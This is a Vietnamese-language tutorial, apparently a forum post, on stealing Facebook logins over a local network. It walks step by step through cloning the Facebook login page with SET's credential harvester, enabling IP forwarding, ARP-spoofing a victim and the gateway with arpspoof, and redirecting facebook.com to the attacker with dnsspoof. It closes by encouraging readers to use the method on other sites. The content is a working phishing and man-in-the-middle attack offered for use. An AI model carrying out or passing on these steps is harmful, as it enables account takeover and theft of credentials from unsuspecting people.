Bài giảng 1 _ Giới thiệu thẩm định dự án đầu tư.pdf
Hackface book
1. ======Mr.vjvu======
=====VHB - VHB=====
Thấy dạo này phong trào hack face book rầm rộ quá ^^
Làm cái gọi là tút hack face bằng backtrack trong mạng Lan cho ae về nghịch =.=!
Còn ngoài internet thì sẽ update sau :D
Ở đây vjvu dùng backtrack 5r3 (mạng yếu down lòi mắt )@@
Victim : 192.168.1.101
Attacker: 192.168.1.105
Ok bật backtrack lên ^^
Mở 1 Terminal
Gõ vào : cd /pentest/exploits/set >>> Enter ^^
Gõ tiếp: ./set >> Enter ^^
Sẽ được như thế này ^^
2. Gõ : số 1 ( Social-Engin….) >> Enter
>> tiếp số 2 ( website attack ve….) Enter
>> tiếp số 3 ( Crendetial Harvester ….) Enter
>> tiếp số 2 (site cloner ) Enter
Sau đó gõ ip của backtrack vào, muỗn xem thì mở 1 Terminal lên rồi gõ ifconfig vào để xem ip ( giốngnhư
ipconfig của windown ấy mà): VD của mình là 192.168.1.105 Enter
Tiếp , gõ http://www.facebook.com vào sau cái đoạn Enter the url to clone: rồi enter
Gõ tiếp 80 rồi enter , sẽ được như thế này
3. Ok, bẫy giờ trong mạng Lan bất cứ máy nào gõ vào địa chỉ ip 192.168.1.105 ( cái này là ip mà chúng ta
điền lúc nãy ấy ^^) thì sẽ ra trang login facebook.
Chỉ cần victim đăng nhập vào như thế này
Thì chúng ta nhận dc kẹo như thế này ^^
4. Nhưng không lẽ chạy qua từng thằng bảo nó gõ vào 192.168.1.105 rồi đăng nhập face để mình chôm acc
à @@, tiếp đến sẽ đến bước 2
Đầu tiên ta port forward IP
Mở 1 terminal mới lên, đừng tắt cái cũ nhá ^^
Gõ vào echo 1 > /proc/sys/net/ipv4/ip_forward
Sau đó gõ cat /proc/sys/net/ipv4/ip_forward
Thấy 1 như trong hình là ok
Ok , victim trong lan thì các bạn tự tìm nhá, miễn sao victim đó đang onl và có dùng facebook là ok, có
thể dùng một số phần mềm như netcut, lanforward ….. hoặc ngay trong backtrack cũng có luôn. Tự mò
xíu nhá, ^^
Victim của vjvu là 192.168.1.101 < có dùng facebook =.=!
Chúng ta mở 1 terminal khác lên và gõ ( đừng tắt những cái cũ nhá ^^)
5. arpspoof -i eth0 -t 192.168.1.101 192.168.1.1
ở đây : 192.168.1.101 là ip victim, 192.168.1.1 là Default Gateway
ai chưa biết 2 cái này thì google phát nhá ( bác họ tớ đấy, không biết gì cứ hỏi bác ý )
sẽ được như thế lày :D
Tiếp mở 1 termital khác lên, đừng tắt mây cái cũ nhá
Gõ arpspoof -i eth0 -t 192.168.1.1 192.168.1.101
Ngược cái phía trên , sẽ được như thế này
6. Giờ chúng ta tạo 1 file txt có nội dung
<ip> <website>
với <ip> là IP của website mà ta muốn redirect victim ến, <website> là những website mà khi victim
truy cập sẽ bị redirect sang web của ta.
Chúng ta sẽ tạo file dns.txt với nội dung
192.168.1.105 facebook.com( khi victim vào facebook.com sẽ bị chuyển qua 192.168.1.105)
File chúng ta lưu đâu cũng dc, ( trong backtrack nhá ^^)
Vjvu sẽ lưu ở /dns.txt
Sau khi ta tạo file text, ta mở Terminal khác và gõ :
dnsspoof -i eth0 -f /dns.txt
/dns.txt là đường dẫn file chúng ta tạo lúc nãy
Ok
Rồi ngồi hóng victim vào face nữa thôi thì chúng ta sẽ nhận dc acc thông qua terminal ở bươc 1
Từ đầu tới cuối không được tắt bất cứ terminal nào nhá
Cái này có thể áp dụng cho các website khác, các bạn từ mò nhá
7. End,
Không biết có ai làm chưa làm rồi thì sr nhá, ko camstudio dc vì máy yếu quá @@